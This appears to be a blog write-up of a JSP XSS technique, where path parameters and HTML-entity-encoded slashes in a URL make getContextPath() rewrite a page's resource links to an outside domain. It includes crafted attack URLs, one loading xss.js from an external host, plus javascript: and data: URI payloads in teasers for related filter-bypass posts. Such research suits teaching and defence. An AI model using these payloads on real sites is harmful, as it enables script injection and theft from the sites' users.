Skip to main content

JSP ContextPath Link Manipulation - XSS

This post is about how to manipulate resource links of HTML elements (script, img, link, etc) when getContextPath method is used to obtain base path of resources. With the ability to manipulate links you can do XSS, CSS Injection, etc.

Basically we are going to use path parameters to manipulate context path such that links would point to attacker's domain. There's a good blog that talk about the similar issues : https://superevr.com/blog/2011/three-semicolon-vulnerabilities

However this post is more about manipulating context path to hijack resource links of HTML elementsSo let's have a look at a simple JSP page (test.jsp)

Ref : https://www.roseindia.net/jsp/request-getcontextpath.shtml

This page just loads some resources like script, image, css and that's it. It doesn't take any direct input from user but it is using value returned by request.getContextPath() as base path to resources link.

What can we do here?

Let's try to control the base path by using path parameters :

 http://127.0.0.1:8080/;pathParameter/contextPathExample/test.jsp

As you could see we are able to have a little control over the base path (of links) but it's not really useful right now unless we could manipulate the domain of links.

Now you might be thinking if we could break out of double quotes and inject new tag as :
 http://127.0.0.1:8080/;pathParameter"><svg onload=alert()>/contextPathExample/test.jsp

Unfortunately it won't work because the characters like <,>," gets URL encoded as you can see below.


So what can we do?

As we can't inject HTML code so our goal now is to find a way to manipulate domain of links.

Everyone knows that we can provide resource URLs without protocol also, for example <img src=//example.com/1.jpeg> , here browser will take the protocol from the page URL and consider example.com as domain and try to fetch the 1.jpeg from example.com domain.  Let's try to do the same :

 http://127.0.0.1:8080//;@exampl.com/contextPathExample/test.jsp


Looks like additional forward slashes gets removed. If we try with backward slashes then server throws error. So this idea also failed.

But here's one interesting thing about getContextPath method, it does not URL encode the "&" character.  So we can simply encode forward slash character in HTML character entity as &sol; and then we can manipulate the domain of links as :

 http://127.0.0.1:8080/&sol;rakeshmane.com/xss.js&num;/..;/..;/contextPathExample/test.jsp

Here src, action, etc are the attributes and browser decodes the value (HTML Entities) from attributes automatically before fetching the link hence &sol; becomes / and &num; becomes # and final link becomes : //rakeshmane.com/xss.js.

And boom!

We hijacked all the links of all HTML elements like script, link, form, img, etc. Just for example we injected "xss.js" file in script element's source and we got easy XSS.

That's it.


Comments

Post a comment

Popular posts from this blog

Xssing Web Part - 1

Xssing Web Part - 1
Hello,

I'm thinking about sharing everything I know about XSS :) However it's not possible to put all methods in one single post so I would be making several parts of "Xssing Web". Mostly I would be talking about how to bypass XSS filters and how to turn most of non exploitable XSS to exploitable.


All of you might have encountered one such end point that takes URL as parameter and redirects to it using javascript like :

location.href='URL' 
or
window.location.href='URL' 
or
window.location.replace('URL') 
or
window.location='URL'


In this post I would be talking about how to get XSS in such situations and how to bypass their filters.

First thing we can do here is try 'javascript' protocol or 'data' URI scheme.

window.location='javascript:alert(1)'
or
window.location='data:html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg'

It would execute 'alert(1)' function.

From now onwards I will only be talki…

Xssing Web Part - 2

Xssing Web With Unicodes
Hello friends, 

This is the second part of "Xssing Web". In this post I would show how to abuse unicodes to bypass XSS filters. 
BTW if you want to check previous part click here.

Note : If you think there are any mistakes in this post then kindly mention it in comments.

I have developed several XSS challenges to show how unicodes can be used to bypass filters. If you want to try those challenges first then click here, get back here if you couldn't solve any.


Abusing Unicode :

So what is Unicode?

-> Unicode is nothing but the encoding standard. It defines UTF-8UTF-16,UTF-32, etc encodings.

1) UTF-8 :

Characters Size :1 byte to 4 byte

Example :
Character "A" => 0x41
Character "¡"  => 0xC2 0xA1
Character "ಓ" => 0xE0 0xB2 0x93
Character "𪨶" => 0xF0 0xAA 0xA8 0xB6

2) UTF-16:

Character Size : 2 byte

However in UTF-16 there are two ways to represent any characters.

i) UTF-16be (be- Big Endian) [Left to Right Byte …